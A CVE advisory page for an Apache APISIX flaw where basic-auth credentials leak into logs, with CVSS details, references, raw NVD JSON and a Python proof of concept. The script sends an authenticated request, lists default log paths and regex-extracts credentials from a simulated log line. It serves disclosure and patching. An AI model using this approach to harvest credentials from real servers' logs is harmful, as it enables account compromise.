Security Vulnerability Report
CVE-2025-62232 CVSS 7.5 HIGH


Published: 2025-10-31 09:15:48
Last Modified: 2025-11-05 14:44:13

Description

Sensitive data exposure via logging in the basic-auth plugin leads to plaintext usernames and passwords being written to error logs and forwarded to log sinks when the log level is INFO/DEBUG. This creates a high risk of credential compromise through log access. It has been fixed in the following commit: https://github.com/apache/apisix/pull/12629 Users are recommended to upgrade to version 3.14, which fixes this issue.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* - VULNERABLE
Apache APISIX >= 1.0, < 3.14.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import base64
import re

import requests

# CVE-2025-62232 PoC - Apache APISIX Basic-Auth Information Disclosure
# This PoC demonstrates how credentials can be obtained from logs

TARGET = "http://target-apisix-server:9080"
USERNAME = "admin"
PASSWORD = "secret_password"
VICTIM_ENDPOINT = "/api/vulnerable-endpoint"


def exploit():
    """
    Step 1: Send a request with Basic Auth credentials.
    The credentials will be logged if the log level is INFO/DEBUG.
    """
    # Basic auth carries base64("user:pass"), not the raw "user:pass" string
    token = base64.b64encode(f"{USERNAME}:{PASSWORD}".encode()).decode()
    headers = {"Authorization": f"Basic {token}"}

    # Send request to trigger authentication logging
    response = requests.get(f"{TARGET}{VICTIM_ENDPOINT}", headers=headers, timeout=10)
    print("[*] Request sent with Basic Auth")
    print(f"[*] Response status: {response.status_code}")

    # Step 2: Access logs to retrieve plaintext credentials.
    # In a real attack, this would be via:
    # - Log file access (if accessible via path traversal)
    # - Log aggregation system (Elasticsearch, Splunk, etc.)
    # - Log forwarding endpoint exploitation

    # Example: default log locations that would be checked if they are readable
    log_paths = [
        "/usr/local/apisix/logs/error.log",
        "/var/log/apisix/error.log",
        "/opt/apisix/logs/access.log",
    ]
    print(f"[*] Candidate log files: {', '.join(log_paths)}")

    # Simulated log content extraction (no log file is actually read here)
    simulated_log = (
        f"[INFO] {response.status_code} - Basic auth user: {USERNAME} pass: {PASSWORD}"
    )
    print(f"[*] Simulated log entry: {simulated_log}")

    # Regex to extract the plaintext credentials from the log line
    cred_pattern = r"user:\s*(\S+)\s+pass:\s*(\S+)"
    match = re.search(cred_pattern, simulated_log)
    if not match:
        print("[-] No credentials found in log entry")
        return None
    decoded_creds = f"{match.group(1)}:{match.group(2)}"
    print(f"[+] Extracted credentials: {decoded_creds}")
    return decoded_creds


if __name__ == "__main__":
    exploit()
```

References

https://lists.apache.org/thread/32hdgh570btfhg02hfc7p7ckf9v83259 (Mailing List, Patch, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2025/10/30/4 (Mailing List)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-62232",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-31T09:15:48.053",
    "lastModified": "2025-11-05T14:44:13.057",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Sensitive data exposure via logging in basic-auth leads to plaintext usernames and passwords written to error logs and forwarded to log sinks when log level is INFO/DEBUG. This creates a high risk of credential compromise through log access.\nIt has been fixed in the following commit:  https://github.com/apache/apisix/pull/12629 \nUsers are recommended to upgrade to version 3.14, which fixes this issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-532"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "1.0",
                "versionEndExcluding": "3.14.0",
                "matchCriteriaId": "16698AAC-0684-4279-8BB8-09EC98C14F79"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://lists.apache.org/thread/32hdgh570btfhg02hfc7p7ckf9v83259",
        "source": "[email protected]",
        "tags": ["Mailing List", "Patch", "Vendor Advisory"]
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2025/10/30/4",
        "source": "af854a3a-2127-422b-91ae-364da2661108",
        "tags": ["Mailing List"]
      }
    ]
  }
}
```